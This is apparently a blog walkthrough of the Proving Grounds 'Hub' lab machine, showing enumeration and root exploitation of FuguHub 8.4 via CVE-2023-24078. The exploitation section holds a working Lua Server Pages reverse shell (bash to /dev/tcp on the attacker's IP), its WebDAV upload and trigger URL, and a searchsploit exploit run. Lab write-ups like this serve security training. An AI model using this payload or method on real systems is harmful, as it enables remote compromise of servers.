PG - Hub

PG – Hub

In this walk through, we will be going through the Hub room from Proving Grounds. This room is rated as Easy on the platform and it consists of exploitation of FuguHub CMS using CVE-2023-24078 which eventually gives us root on the target. So, let’s get started without any delay.

Hub

Machine Info:

TitleHub
IPaddress192.168.171.25
DifficultyEasy
OSLinux
DescriptionHub is an Easy rated Linux machine that is running FuguHub CMS which is vulnerable to CVE-2023-24078 that is a RCE vulnerability.

Enumeration:

  • I started off with my regular aggressive nmap scan and found 4 ports opened – 22 (SSH), 80, 8082, 9999 (HTTP).

$ sudo nmap -A 192.168.171.25
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-28 22:48 IST

Nmap scan report for 192.168.171.25
Host is up (0.20s latency).
Not shown: 995 closed ports
PORT     STATE    SERVICE  VERSION
22/tcp   open     ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.4p1: 
|     	PRION:CVE-2016-20012	5.0	https://vulners.com/prion/PRION:CVE-2016-20012
|     	PRION:CVE-2021-28041	4.6	https://vulners.com/prion/PRION:CVE-2021-28041
|     	CVE-2021-28041	4.6	https://vulners.com/cve/CVE-2021-28041
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	PRION:CVE-2020-14145	4.3	https://vulners.com/prion/PRION:CVE-2020-14145
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-20012	4.3	https://vulners.com/cve/CVE-2016-20012
|     	PRION:CVE-2021-41617	3.5	https://vulners.com/prion/PRION:CVE-2021-41617
|     	PRION:CVE-2021-36368	2.6	https://vulners.com/prion/PRION:CVE-2021-36368
|_    	CVE-2021-36368	2.6	https://vulners.com/cve/CVE-2021-36368
53/tcp   filtered domain
80/tcp   open     http     nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: 403 Forbidden
8082/tcp open     http     Barracuda Embedded Web Server
| http-methods: 
|_  Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
|_http-server-header: BarracudaServer.com (Posix)
|_http-title: Home
| http-webdav-scan: 
|   Server Date: Sun, 28 Jan 2024 17:19:16 GMT
|   WebDAV type: Unknown
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
|_  Server Type: BarracudaServer.com (Posix)
9999/tcp open     ssl/http Barracuda Embedded Web Server
| http-methods: 
|_  Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
|_http-server-header: BarracudaServer.com (Posix)
|_http-title: Home
| http-webdav-scan: 
|   Server Date: Sun, 28 Jan 2024 17:19:17 GMT
|   WebDAV type: Unknown
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
|_  Server Type: BarracudaServer.com (Posix)
| ssl-cert: Subject: commonName=FuguHub/stateOrProvinceName=California/countryName=US
| Subject Alternative Name: DNS:FuguHub, DNS:FuguHub.local, DNS:localhost
| Not valid before: 2019-07-16T19:15:09
|_Not valid after:  2074-04-18T19:15:09
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/28%OT=22%CT=1%CU=39491%PV=Y%DS=4%DC=T%G=Y%TM=65B68C9
OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%II=I%TS=A)OPS(O1=M
OS:54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%
OS:O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%
OS:DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=86
OS:60%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   202.12 ms 192.168.45.1
2   202.09 ms 192.168.45.254
3   202.91 ms 192.168.251.1
4   202.93 ms 192.168.171.25

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.66 seconds

nmap scan

port 9999 open

  • Enumerated the web server on port 80, it threw a 403 Forbidden error on my face.

403 Forbidden

  • Next, enumerated the web server on port 8082. It reveals a application running on it. As per the nmap results, it is running “Barracuda Embedded Web Server”.

Barracuda Embedded Web Server

  • Looked around the application and found a page where i can set an Administrator account. So, i created one with the below information.

Set Administrator Account

email - [email protected]
Admin username - admin
Password - password

Setting Administrator password

Administrator Account Saved

  • Next, i used the created account information to log in to the CMS. Configured it with default settings and clicked save.

CMS login panel

Configure CMS

  • Now, i was able to access a Web File Server. At this point, i wasn’t sure what to do next. So, fired gobuster on the target to reveal any juicy directories.

Web File Server

gobuster dir -u http://192.168.171.25/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt

gobuster scan

  • Enumerated around the application reveals a License page where the application version was highlighted – FuguHub 8.4.

FuguHub 8.4

CVE-2023-24078

  • Looked for any known exploits related to the concerned version and found that the target version is vulnerable to CVE-2023-24078 that is RCE vulnerability.

CVE-2023-24078

  • Copied the exploit to my current working directory using searchsploit.

searchsploit FuguHub

searchsploit -m multiple/webapps/51550.py

searchsploit FuguHub

copying the exploit

Exploitation & Getting root:

  • The exploits takes a listening IP and port for reverse shell along with the target host and port as input. Once the execution is completed, it should get a shell back on my listener but it didn’t

python3 51550.py -l 192.168.45.182 -p 4444 -r 192.168.171.25 -rp 8082

firing the exploit

  • So, i performed the exploitation manually, i went to target location and copied the WebDAV session URL.

http://192.168.171.25:8082/fs/

Webdav upload funtionality

WebDAV Session URL

http://192.168.171.25:8082/fs/0dae0a33426ff7bf48d68b67/

  • Prepared the below lua script that will be used as our payload.

<div style="margin-left:auto;margin-right: auto;width: 350px;">

<div id="info">
<h2>Lua Server Pages Reverse Shell</h2>
<p>Delightful, isn't it?</p>
</div>

<?lsp if request:method() == "GET" then ?>
   <?lsp os.execute("bash -c 'bash -i >& /dev/tcp/192.168.45.182/4444 0>&1'") ?>
<?lsp else ?>
   You sent a <?lsp=request:method()?> request
<?lsp end ?>

</div>

  • Next, accessed the webDAV share using cadaver and uploaded our lua script to the it.

$ cadaver 
dav:!> open http://192.168.171.25:8082/fs/0dae0a33426ff7bf48d68b67/
dav:/fs/0dae0a33426ff7bf48d68b67/> cd ..
Authentication required for Web File Server on server `192.168.171.25':
Username: admin
Password: 
dav:/fs/> put rev.lsp
Uploading rev.lsp to `/fs/rev.lsp':
Progress: [=============================>] 100.0% of 364 bytes succeeded.
dav:/fs/> 

putting rev.lsp file

  • We can then execute our shell by visiting to the below URL giving us the shell as user root.

http://192.168.171.25:8082/rev.lsp

got root

  • Finally, captured the root flag and completed the machine.

proof flag

Also Read: PG – Heist

Conclusion:

Conclusion

So that was “Hub” for you. We started off with a regular nmap scan and found 4 ports opened – 22 (SSH), 80, 8082, 9999 (HTTP). Enumerated the web server on port 8082 which reveals “Barracuda Embedded Web Server” running on it. Created an admin account and got access to the backend which reveals version of FugHub 8.4. Looked online for any known exploit and found that it is vulnerable to CVE-2023-24078. Used the same to exploit and get root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top